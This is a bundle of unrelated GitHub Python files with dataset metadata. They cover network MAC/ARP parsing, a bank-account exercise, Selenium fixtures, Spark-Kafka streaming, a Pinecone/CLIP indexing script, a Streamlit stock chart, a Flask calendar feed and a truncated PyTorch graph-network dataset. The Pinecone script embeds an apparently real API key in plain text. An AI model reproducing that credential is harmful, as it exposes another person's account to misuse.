"epiqc/PartialCompilation", "sub_path": "qiskit-aqua/qiskit/aqua/components/optimizers/optimizer.py", "file_name": "optimizer.py", "file_ext": "py", "file_size_in_byte": 9460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": 
"31", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "qiskit.aqua.Pluggable", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 13, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 172, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "10148168333", "text": "import re\nimport tools.exceptions\nfrom mac_vendor_lookup import MacLookup\n\nMAC_PATTERN = \"^\\s*([a-z0-9]{6}-[a-z0-9]{6})\\s*(\\S+)\\s*(\\d)*$\"\nMAC_PATTERN_COMPILED = re.compile(MAC_PATTERN)\n\nPORT_PATTERN = \"^\\s{2}(.{8})\\s{1}(.{10})\\s{1}(.{7})\\s{1}(.{13})\\s{1}(.{8})\\s{1}(.{10})\\s{1}(.{6})\\s{1}(.{1,8})\"\nPORT_PATTERN_COMPILED = re.compile(PORT_PATTERN)\n\nARP_PATTERN = \"^(.{15})\\s(.{12})\\s*\\S*\\s*(\\S*).*\"\nARP_PATTERN_COMPILED = re.compile(ARP_PATTERN)\n\nmacLookup = MacLookup()\n\nclass MacInfo:\n def __init__(self, text, patternCompiled):\n global macLookup\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n self.mac = normalize_mac_two_groups(m.group(1))\n self.port = m.group(2)\n self.vlan = m.group(3)\n self.ip = None\n try:\n self.vendor = macLookup.lookup(self.mac)\n except:\n self.vendor = \"UNKNOWN\"\n\n def setIP(self, ip):\n self.ip = ip\n\nclass PortInfo:\n def __init__(self, text, patternCompiled):\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n self.port = m.group(1).strip()\n self.name = m.group(2).strip()\n self.status = m.group(3).strip()\n self.mode = m.group(4).strip()\n self.speed = m.group(5).strip()\n self.type = m.group(6).strip()\n self.tagged = m.group(7).strip()\n self.untagged = m.group(8).strip()\n self.macs = []\n\n def addMac(self, mac):\n self.macs.append(mac)\n\nclass DevicePattern:\n def __init__(self):\n self.patterns = {}\n\n def add_pattern(self, name, pattern):\n if name not in pattern:\n self.patterns[name] = {}\n self.patterns[name]['pattern'] = pattern\n self.patterns[name]['compiled'] = re.compile(pattern)\n\n def get_pattern(self, name):\n if name not in self.patterns:\n raise tools.exceptions.NonExistentPattern\n else:\n return self.patterns[name]['pattern']\n\n def get_pattern_compiled(self, name):\n if name not in self.patterns:\n raise tools.exceptions.NonExistentPattern\n else:\n return self.patterns[name]['compiled']\n\n\ndef load_patterns():\n devPatterns = DevicePattern()\n\n devPatterns.add_pattern('arubaswos_farmtec_macaddresstable', \"^\\s*([a-z0-9]{6}-[a-z0-9]{6})\\s*(\\S+)\\s*(\\d)*$\")\n devPatterns.add_pattern('arubaswos_farmtec_showint', \"^\\s{2}(.{8})\\s{1}(.{10})\\s{1}(.{7})\\s{1}(.{13})\\s{1}(.{8})\\s{1}(.{10})\\s{1}(.{6})\\s{1}(.{1,8})\")\n devPatterns.add_pattern('juniper_farmtec_getarp_old', \"^(.{15})\\s(.{12})\\s*\\S*\\s*(\\S*).*\")\n devPatterns.add_pattern('juniper_farmtec_getarp', \"^(.{16})\\s(.{12})\\s*\\S*\\s*(\\S*).*\")\n\n return devPatterns\n\n\ndef parse_arp(text, patternCompiled):\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n ip = m.group(1).strip()\n mac = normalize_mac_twelve_digits(m.group(2).strip())\n state = m.group(3).strip()\n return mac, ip, state\n\ndef normalize_mac_two_groups(mac):\n return \"{}:{}:{}:{}:{}:{}\".format(mac[0:2], mac[2:4], mac[4:6], mac[7:9], mac[9:11], mac[11:13])\n\ndef normalize_mac_twelve_digits(mac):\n return \"{}:{}:{}:{}:{}:{}\".format(mac[0:2], mac[2:4], mac[4:6], mac[6:8], mac[8:10], mac[10:12])\n\n\n", "repo_name": "robac/arubaos_port_devices", "sub_path": "tools/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.compile", "line_number": 6, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 9, 
"usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "mac_vendor_lookup.MacLookup", "line_number": 14, "usage_type": "call"}, {"api_name": "tools.exceptions.exceptions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 21, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 39, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "tools.exceptions.exceptions", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 66, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 72, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "36981969947", "text": "from datetime import datetime, timedelta\n\nclass ContaBancaria:\n def __init__(self, agencia, conta, saldo_inicial=0):\n self.agencia = agencia\n self.conta = conta\n self.saldo = saldo_inicial\n self.transacoes = []\n self.ultimo_reset = datetime.now()\n\n def deposito(self, valor):\n if valor >= 0:\n self.saldo += valor\n self.transacoes.append(\"Depósito: R${:.2f}\".format(valor))\n return True\n else:\n return False\n\n def saque(self, valor):\n hoje = datetime.now()\n if (hoje - self.ultimo_reset).days > 0:\n self.transacoes = []\n self.ultimo_reset = hoje\n\n if 0 < valor <= 500 and len(self.transacoes) < 3 and valor <= self.saldo:\n self.saldo -= valor\n self.transacoes.append(\"Saque: R${:.2f}\".format(valor))\n return True\n elif self.saldo < valor:\n print(\"Saldo insuficiente para saque\")\n return False\n else:\n print(\"Limite diário de saques atingido ou valor de saque inválido\")\n return False\n\n def extrato(self):\n extrato = \"Saldo: R${:.2f}\\n\".format(self.saldo)\n extrato += \"\\n\".join(self.transacoes)\n return extrato\n\n\nagencia = input(\"Digite o número da agência: \")\nconta = input(\"Digite o número da conta: \")\n\nconta_usuario = ContaBancaria(agencia, conta, saldo_inicial=1000)\n\nwhile True:\n print(\"\\nMenu:\")\n print(\"1 - Depósito\")\n print(\"2 - Saque\")\n print(\"3 - Extrato\")\n print(\"0 - Sair\")\n opcao = input(\"Escolha uma opção: \")\n\n if opcao == \"1\":\n valor = float(input(\"Digite o valor para depósito: \"))\n conta_usuario.deposito(valor)\n elif opcao == \"2\":\n valor = float(input(\"Digite o valor para saque: \"))\n if conta_usuario.saldo - valor >= 0:\n conta_usuario.saque(valor)\n else:\n print(\"Saldo insuficiente para saque\")\n elif opcao == \"3\":\n print(conta_usuario.extrato())\n elif opcao == \"0\":\n break\n else:\n print(\"Opção inválida\")\n\nprint(\"Obrigado por utilizar nosso sistema!\")\n", "repo_name": "Richardmsbr/dio_desafio", "sub_path": "desafio_bancario.py", "file_name": "desafio_bancario.py", "file_ext": "py", "file_size_in_byte": 2157, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "15999875798", "text": "from selenium import webdriver\nimport pytest\nimport time\n\n# driver = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\geckodriver.exe\")\n# driver = webdriver.Ie(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\IEDriverServer.exe\")\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--browser_name\", action=\"store\", default=\"chrome\"\n )\n\n@pytest.fixture(scope=\"class\")\ndef setup(request):\n browser_name=request.config.getOption(\"browser_name\")\n if browser_name == \"chrome\":\n driver = webdriver.Chrome(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\chromedriver.exe\")\n\n elif browser_name == \"firefox\":\n driver = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\geckodriver.exe\")\n\n elif browser_name == \"ie\":\n driver = webdriver.Ie(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\IEDriverServer.exe\")\n\n driver.get(\"https://qaclickacademy.github.io/protocommerce/\")\n driver.maximize_window()\n request.cls.driver = driver\n yield\n driver.close()\n", "repo_name": "hewerthon/pytest-appium", "sub_path": "pytest_e2e/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.Ie", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 23, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "2166766080", "text": "from create_session import get_spark_object\nimport get_all_variable as gav\nfrom udf import process_message_udf\nfrom mysql_load import mysql_connection\nfrom pyspark.sql.functions import row_number, col, hour, when, udf, desc\nfrom pyspark.sql.window import Window\nfrom preprocessdata import process_data\n\ndef main():\n #creating a spark object.\n spark = get_spark_object(gav.appName)\n\n #adding \"C:\\Bigdata\\spark-3.1.2-bin-hadoop3.2\\jars\\mysql-connector-java-8.0.12.jar\" jar into spark-jars folder.\n #advertiserDf loading from mysql.\n advertiser_df = mysql_connection(spark,gav.advertiser_tab)\n\n #loads the adslot_df table from mysql into dataframe\n adslot_df = mysql_connection(spark,gav.adslot)\n\n #reading kafka_streaming\n kafka_params = {\n \"kafka.bootstrap.servers\": gav.bootstrap_server,\n \"subscribe\": gav.topic,\n \"startingOffsets\": \"earliest\"}\n kafka_messages = (spark.readStream.format(\"kafka\")\n .options(**kafka_params)\n .load()\n )\n #register the udf\n process_df = kafka_messages.select(process_message_udf(kafka_messages).alias(\"processed_data\"))\n\n # Join the message data with advertiser and adslot data\n joined_df = process_df.join(advertiser_df, [\"advertiserId\"], \"left\").join(adslot_df, [\"adslotId\"], \"left\")\n\n # filter the record using window function and rank the data (latest data start from 1)\n win = Window.partitionBy(\"uniqId\", hour(\"date_time\")).orderBy(desc(\"date_time\"))\n joined_df = joined_df.withColumn(\"row_num\", row_number().over(win))\n\n joined_df = joined_df.filter(col(\"row_num\") == 1).dropDuplicates([\"uniqId\", \"hour\"])\n\n # 2.Apply the specified conditions\n process_df = process_data(joined_df)\n\n #writing output to the console\n query = (process_df.writeStream\n .outputMode(\"append\")\n .format(\"console\")\n .start()\n )\n\n # # Await the termination of the streaming query\n query.awaitTermination()\n\n #writing output to the HDFS. 
#Here I am writing to local\n # query1 = (process_df.writeStream\n # .outputMode(\"append\")\n # .format(\"json\")\n # .option(\"path\", \"file:///D://python record\")\n # .option(\"checkpointLocation\", \"D://python record//chk\")\n # .start()\n # )\n #\n\n # query1.awaitTermination() #\n\n # # Start the streaming query and wait for it to terminate #\n\nif __name__ == '__main__':\n main()\n", "repo_name": "bhagwat07/pyspark_kafka_assigment", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2522, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "create_session.get_spark_object", "line_number": 11, "usage_type": "call"}, {"api_name": "get_all_variable.appName", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mysql_load.mysql_connection", "line_number": 15, "usage_type": "call"}, {"api_name": "get_all_variable.advertiser_tab", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mysql_load.mysql_connection", "line_number": 18, "usage_type": "call"}, {"api_name": "get_all_variable.adslot", "line_number": 18, "usage_type": "attribute"}, {"api_name": "get_all_variable.bootstrap_server", "line_number": 22, "usage_type": "attribute"}, {"api_name": "get_all_variable.topic", "line_number": 23, "usage_type": "attribute"}, {"api_name": "udf.process_message_udf", "line_number": 30, "usage_type": "call"}, {"api_name": "pyspark.sql.window.Window.partitionBy", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.window.Window", "line_number": 36, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.hour", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.desc", "line_number": 36, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.row_number", "line_number": 37, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 39, "usage_type": "call"}, {"api_name": "preprocessdata.process_data", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "71462711448", "text": "import pinecone\nimport boto3\nfrom PIL import Image\nimport clip\nimport torch\nimport uuid\nimport os\nimport joblib\n\npinecone.init(api_key=\"4ccf9bfd-91b0-4ed7-8b3c-6f11c9b2fcf0\", environment=\"us-east-1-aws\")\ns3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='###########', \n aws_secret_access_key='##########')\nindex = pinecone.Index(\"panoptes-frame-vectors-shadow\")\nmodel, preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\nmodel_obj = {\"model\": model, \"preprocess_fn\": preprocess}\npreprocess = model_obj['preprocess_fn']\nmodel = model_obj['model']\nresponse = s3.list_objects(Bucket=\"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\")\nobjects = response['Contents']\nprint(objects)\nprediction_output = {}\nprediction_output[\"vectors\"] = []\nprediction_output[\"user_id\"] = \"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\"\nfor obj in objects:\n s3.download_file(\"user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a\", obj['Key'], 'temp_image.jpg')\n image = Image.open('temp_image.jpg')\n image_input = preprocess(image).unsqueeze(0).to(\"cpu\")\n with torch.no_grad():\n image_features = model.encode_image(image_input)\n frame_id = str(uuid.uuid4())\n vector_dict = {\n 'id' : frame_id,\n 'values' : image_features.cpu().numpy().tolist()[0],\n 'metadata': {\n 'video' : 'images_10secsimple_cup_beach.mp4',\n 'image_name' : obj['Key']\n }\n }\n # print(vector_dict)\n prediction_output[\"vectors\"].append(vector_dict)\n\njoblib.dump(prediction_output, \"vector_dump.z\")\nindex.upsert(prediction_output[\"vectors\"], namespace=prediction_output[\"user_id\"], show_progress=True)\n\nquery_tokens = clip.tokenize([\"Cup on a table\"]).to(\"cpu\")\nwith torch.no_grad():\n query_features = model.encode_text(query_tokens)\nquery_features = query_features.cpu().numpy().tolist()[0]\n\n\nquery_response = index.query(\n namespace='user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a',\n top_k=5,\n include_metadata=True,\n vector=query_features,\n filter={\n 'video': {'$in': ['images_10secsimple_cup_beach.mp4']}\n }\n)\n\nprint(query_response)", "repo_name": "Vi-Sri/panoptes-service", "sub_path": "panoptes-app/backend/test_pinecone.py", "file_name": "test_pinecone.py", "file_ext": "py", "file_size_in_byte": 2132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pinecone.init", "line_number": 10, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "pinecone.Index", "line_number": 15, "usage_type": "call"}, {"api_name": "clip.load", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 30, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 32, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 44, "usage_type": "call"}, {"api_name": "clip.tokenize", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "37616836948", "text": "import yfinance as yf\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\nst.write(\"\"\"\r\n\r\n# NVDA Stock Ticker\r\n\r\nThe last 3 years of NVDA closing price is shown below. NIVIDIA CORP = 'NVDA'\r\n\r\n\"\"\")\r\n\r\ntickerSymbol = 'NVDA'\r\n\r\ntickerData = yf.Ticker(tickerSymbol)\r\n\r\ntickerDf = tickerData.history(period = '1d', start = '2018-1-1', end = '2021-1-1')\r\n#.Open, .Close, .Volume, .Dividends, .StockSplit \r\n\r\nst.line_chart(tickerDf.Close)\r\n\r\nst.write(\"\"\"\r\n\r\nThe last 3 years of trade volume for NVDA is shown below.\r\n\r\n\"\"\")\r\n\r\nst.line_chart(tickerDf.Volume)\r\n", "repo_name": "Codename-SPYDER/Data-Projects", "sub_path": "Streamlit_Projects/Stonks.py", "file_name": "Stonks.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "streamlit.write", "line_number": 5, "usage_type": "call"}, {"api_name": "yfinance.Ticker", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.line_chart", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.line_chart", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "29761380593", "text": "from flask import Flask\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\nfrom pytz import timezone\n\nfrom app import dation_service\n\napp = Flask(__name__)\napp.config.from_object('config.Config')\n\n\n@app.route('/calendar.ics')\ndef calendar_ics():\n ds_info = dation_service.get_driving_school_info(\n app.config[\"SOAP_ENDPOINT\"], app.config[\"SCHOOL_HANDLE\"])\n login_info = dation_service.student_login(ds_info,\n app.config[\"USERNAME\"],\n app.config[\"PASSWORD\"])\n\n planning = dation_service.get_student_planned_courses(ds_info, login_info)\n\n ds_address = dation_service.get_driving_school_address(\n ds_info, login_info)\n\n address = (f\"{ds_address.street} {ds_address.housenumber}, \"\n f\"{ds_address.zipcode} {ds_address.city}\")\n\n tz = timezone(\"Europe/Amsterdam\")\n\n cal = Calendar()\n cal.add('prodid', '-//Dation ICS feed//loriancoltof.nl//')\n cal.add('version', '2.0')\n\n cal.add('method', 'PUBLISH')\n cal.add('x-wr-calname', 'Rijles')\n\n for item in planning:\n event = Event()\n\n event.add('summary', item.name)\n event.add('dtstart', item.start_time.astimezone(tz))\n event.add('dtend', item.stop_time.astimezone(tz))\n event.add('dtstamp', datetime.now())\n\n event.add('description',\n f\"Instructeur: {item.instructor}\\n\"\n f\"Pakket: {item.course_info.type_name} \"\n f\"({item.course_info.category})\")\n event.add('location', address)\n\n cal.add_component(event)\n\n return cal.to_ical(), {\"Content-Type\": \"text/calendar\"}\n", "repo_name": "LorianColtof/Dation-iCal-Feed", "sub_path": "app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "app.config.from_object", "line_number": 9, "usage_type": "call"}, {"api_name": "app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.dation_service.get_driving_school_info", "line_number": 14, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 14, "usage_type": "name"}, {"api_name": "app.config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.dation_service.student_login", "line_number": 16, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 16, "usage_type": "name"}, {"api_name": "app.config", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.config", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.dation_service.get_student_planned_courses", "line_number": 20, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 20, "usage_type": "name"}, {"api_name": "app.dation_service.get_driving_school_address", "line_number": 22, "usage_type": "call"}, {"api_name": "app.dation_service", "line_number": 22, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 28, "usage_type": "call"}, {"api_name": "icalendar.Calendar", "line_number": 30, "usage_type": "call"}, {"api_name": "icalendar.Event", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "name"}, {"api_name": "app.route", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "6458332991", "text": "import argparse\nimport sys\nsys.setrecursionlimit(300000)\n\nimport time\nimport copy\nimport os\nimport itertools\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io\n\nfrom sklearn.metrics import mean_absolute_error #여기도 바꿔야 함!!\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import TensorDataset, Dataset, DataLoader\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom tqdm.notebook import tqdm\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nparser = argparse.ArgumentParser()\nargs = parser.parse_args(\"\")\nargs.seed = 123\nargs.val_size = 0.1\nargs.test_size = 0.1\nargs.shuffle = True\n\n################################################## STEP 1. data preparation ################################################\n# 1-1 data load\ntarg_folder_raw='../ADNI-struct-count' #이 폴더가 있는 곳으로 경로 설정 해주세요\nnode_feat_csv = pd.read_csv(os.path.join(targ_folder_raw, 'node-feat.csv.gz'), header=None)\ngraph_label_csv = pd.read_csv(os.path.join(targ_folder_raw, 'graph-label.csv.gz'), header=None)\nconmat = scipy.io.loadmat('../data/adni_connectome_aparc_count.mat') #이 파일이 있는 곳으로 경로 설정 해주세요.\nlist_adj = conmat['connectome_aparc0x2Baseg_count'].T # (179, 84, 84)\n\n\n# 1-2 label scaling - pytorch label starts from 0.\nclass2idx = {\n 3:2,\n 2:1,\n 1:0\n}\n\nidx2class = {v: k for k, v in class2idx.items()}\n\ngraph_label_csv.replace(class2idx, inplace=True) #이제 0, 1, 2로 encoding 되어있음.\n\n\n# 1-3 feature scaling\nmm = MinMaxScaler()\n\n### (1) node feat scaling + to numpy\nlist_feature = mm.fit_transform(node_feat_csv).reshape(179,84,2)\n\n### (2) graph label to numpy\nlist_NIH_score = graph_label_csv.to_numpy()\n\n### (3) edge feature threshold + scaling (이미 numpy였음)\n\n##### (3-1) threshold as 20\nfor i in range(list_adj.shape[0]):\n for j in range(list_adj.shape[1]):\n for k in range(list_adj.shape[2]):\n if list_adj[i][j][k] <=20:\n list_adj[i][j][k] = 0\n\n##### (3-2) scaling with minmax scaler\nlist_adj = mm.fit_transform(list_adj.reshape(list_adj.shape[0],-1)).reshape(list_adj.shape[0], 84, 84) \n\n\n################################################## STEP 2. 
build model ################################################\n\n# 2-1 data loader\nclass GCNDataset(Dataset):\n def __init__(self, list_feature, list_adj, list_NIH_score):\n self.list_feature = list_feature\n self.list_adj = list_adj\n self.list_NIH_score = list_NIH_score\n \n def __len__(self):\n return len(self.list_feature)\n \n def __getitem__(self, index):\n return self.list_feature[index], self.list_adj[index], self.list_NIH_score[index]\n\n\nclass GCNAugmentedDataset(Dataset):\n def __init__(\n self,\n list_feature,\n list_adj,\n list_NIH_score,\n feat_mask_apply_prob: float = 0.5, # 매 instance 마다 feature masking augmentation 적용할 확률\n feat_mask_prob: float = 0.1, # feature masking 적용할 때 masking 할 노드의 percentage\n edge_perturb_apply_prob: float = 0.5, # 매 instance 마다 edge perturbation augmentation 적용할 확률\n edge_perturb_prob: float = 0.1, # edge perturbation 적용할 때 perturb 할 edge 의 percentage\n node_drop_apply_prob: float = 0.5, # 매 instance 마다 node drop augmentation 적용할 확률\n node_drop_prob: float = 0.1, # node drop 적용할 때 masking 할 노드의 percentage\n subgraph_apply_prob: float = 0.5, # 매 instance 마다 subgraph augmentation 적용할 확률\n subgraph_prob: float = 0.1, # subgraph 에서 제외될 노드의 percentage\n seed: int = 0, # random seed for reproducibility\n ):\n self.list_feature = list_feature.astype(np.float32)\n self.list_adj = list_adj.astype(np.float32)\n self.list_NIH_score = list_NIH_score\n assert all(0.0 <= p <= 1.0\n for p in [feat_mask_apply_prob, feat_mask_prob,\n edge_perturb_apply_prob, edge_perturb_prob,\n node_drop_apply_prob, node_drop_prob,\n subgraph_apply_prob, subgraph_prob])\n self.feat_mask_apply_prob = feat_mask_apply_prob\n self.feat_mask_prob = feat_mask_prob\n self.edge_perturb_apply_prob = edge_perturb_apply_prob\n self.edge_perturb_prob = edge_perturb_prob\n self.node_drop_apply_prob = node_drop_apply_prob\n self.node_drop_prob = node_drop_prob\n self.subgraph_apply_prob = subgraph_apply_prob\n self.subgraph_prob = subgraph_prob\n self.rng = np.random.default_rng(seed)\n num_nodes = list_feature[0].shape[0]\n all_edges = []\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n all_edges.append((i, j))\n self.all_edges = np.array(all_edges)\n\n def __len__(self):\n return len(self.list_feature)\n\n def __getitem__(self, index):\n orig_feat, orig_adj, orig_score = self.list_feature[index], self.list_adj[index], self.list_NIH_score[index]\n\n aug_feat = np.copy(orig_feat)\n aug_adj = np.copy(orig_adj)\n num_nodes = orig_feat.shape[0]\n feature_dim = orig_feat.shape[1]\n\n if self.rng.random() < self.subgraph_apply_prob:\n num_subgraph_nodes = int(num_nodes * (1 - self.subgraph_prob))\n subgraph_nodes = []\n node_sample_prob = np.ones(num_nodes) / num_nodes\n\n while len(subgraph_nodes) < num_subgraph_nodes:\n center_node = self.rng.choice(num_nodes, 1, p=node_sample_prob)[0]\n connected_nodes = self.get_all_connected_nodes(index, center_node)\n subgraph_nodes.extend(connected_nodes)\n node_sample_prob[connected_nodes] = 0.0\n prob_sum = node_sample_prob.sum()\n if prob_sum > 0:\n node_sample_prob = node_sample_prob / node_sample_prob.sum()\n subgraph_nodes = set(subgraph_nodes[:num_subgraph_nodes])\n deleted_nodes = np.array([n for n in range(num_nodes) if n not in subgraph_nodes])\n aug_feat[deleted_nodes] = 0.0\n if self.rng.random() < self.node_drop_apply_prob:\n num_drop_nodes = int(num_nodes * self.node_drop_prob)\n drop_nodes = self.rng.choice(num_nodes, num_drop_nodes, replace=False)\n if len(drop_nodes) > 0:\n aug_feat[drop_nodes] = 0.0\n if self.rng.random() 
< self.feat_mask_apply_prob:\n # apply feature masking\n num_mask = int(num_nodes * self.feat_mask_prob)\n mask_indices = self.rng.choice(num_nodes, num_mask, replace=False)\n if len(mask_indices) > 0:\n aug_feat[mask_indices] = self.rng.random((num_mask, feature_dim)) # 이젠 0 대신 noise로 mask\n if self.rng.random() < self.edge_perturb_apply_prob:\n # apply feature masking\n num_perturb = int(num_nodes * (num_nodes-1) * self.edge_perturb_prob * 0.5)\n xy_indices = self.all_edges[self.rng.choice(self.all_edges.shape[0], num_perturb, replace=False)]\n x_indices = xy_indices[:, 0]\n y_indices = xy_indices[:, 1]\n perturbed_values = self.rng.random(num_perturb)\n if len(x_indices) > 0:\n aug_adj[x_indices, y_indices] = perturbed_values\n aug_adj[y_indices, x_indices] = perturbed_values\n return orig_feat, orig_adj, aug_feat, aug_adj, orig_score\n\n def neighbors(self, index, node):\n return np.where(self.list_adj[index][node] > 0)[0]\n\n def get_all_connected_nodes(self, index, node):\n visited = set()\n self._get_all_connected_nodes(index, node, visited)\n return sorted(visited) # sort for reproducibility\n\n def _get_all_connected_nodes(self, index, node, visited):\n visited.add(node)\n for neighbor in self.neighbors(index, node):\n if neighbor in visited:\n continue\n self._get_all_connected_nodes(index, neighbor, visited)\n\n\ndef partition(list_feature, list_adj, list_NIH_score, args):\n num_total = len(list_feature)\n num_train = int(num_total * (1 - args.test_size - args.val_size))\n num_val = int(num_total * args.val_size)\n num_test = int(num_total * args.test_size)\n \n feature_train = list_feature[:num_train]\n adj_train = list_adj[:num_train]\n NIH_score_train = list_NIH_score[:num_train]\n feature_val = list_feature[num_train:num_train + num_val]\n adj_val = list_adj[num_train:num_train + num_val]\n NIH_score_val = list_NIH_score[num_train:num_train + num_val]\n feature_test = list_feature[num_total - num_test:]\n adj_test = list_adj[num_total - num_test:]\n NIH_score_test = list_NIH_score[num_total - num_test:]\n \n train_set = GCNDataset(feature_train, adj_train, NIH_score_train)\n val_set = GCNDataset(feature_val, adj_val, NIH_score_val)\n test_set = GCNDataset(feature_test, adj_test, NIH_score_test)\n \n partition = {\n 'train' : train_set,\n 'val' : val_set,\n 'test': test_set\n }\n \n return partition\n\n# 2-2 module\nclass SkipConnection(nn.Module):\n \n def __init__(self, in_dim, out_dim):\n super(SkipConnection, self).__init__()\n \n self.in_dim = 